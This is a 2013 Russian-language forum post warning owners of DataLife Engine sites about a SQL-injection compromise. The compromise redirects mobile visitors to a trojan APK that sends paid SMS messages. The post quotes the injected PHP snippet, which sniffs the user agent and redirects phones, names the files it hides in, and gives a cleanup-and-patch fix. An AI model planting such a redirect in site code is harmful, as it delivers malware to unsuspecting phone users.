Доброе утро, Гость! Представляем Вам наши форумы. Вы можете зарегистрироваться чтобы писать на форумах или зайдите под своим именем, если Вы уже регистрировались.
   
   


Форум
 Разное / Флейм
         Если у вас есть сайт на Datalife Engine, критическая уязвимость

Похожие темы

Если у вас есть сайт на Datalife Engine, критическая уязвимость


События Среда, 16.01.2013, 00:36

Kurman

Группа: Пользователь
Ранг: Продвинутый
Cообщений: 237
Регистрация: 26.10.2009
Город: Moscow
Троян browser_update_install.apk
В общем, после Нового года, мне 9 января, некоторым 13 января - у кого есть сайты на DLE движке была осуществлена SQL инъекция.

При открытии сайта на компе ничего не происходит, но при заходе с телефона, подгружается browser_update_install.apk - троянец, который впоследствии будет слать с вашего телефона СМС на короткие платные номера, высасывая деньги с счета телефона.

Вот внедренный код:
PHP-код
$iphone strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if (
$iphone || $android || $palmpre || $ipod || $berry === true) { 

    
header('Location: http://domain/');

}


Этот код может быть внедрен в файлы
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

Чуть не поседел, пока пару часов судорожно искал причины.. Хорошие люди выложили, хорошо хоть нашел )))

Решение: удалить код, применить патч http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

Отредактировано Kurman: 16.01.2013, 00:37:13

Пользователь офлайн


Похожие темы  |   Предыдущая тема  |   Следующая тема

Быстрый переход:  
 

 Сейчас на сайте

Пользователей: 0, Гостей: 7

Поисковые боты: 199
BingBot(6), Bot(164), oBot(24), Googlebot(3), Crawler(2)
 Статистика форума

  Темы Сообщения Пользователи
За сутки:
За неделю:
За месяц:
Всего:
Мы приветствуем нового участника: wonad81290
 Дни рождения

maxter (42)
Copyright © 2009 - 2024 SX All rights reserved | Powered by SX CMS 1.06 UTF | Контакты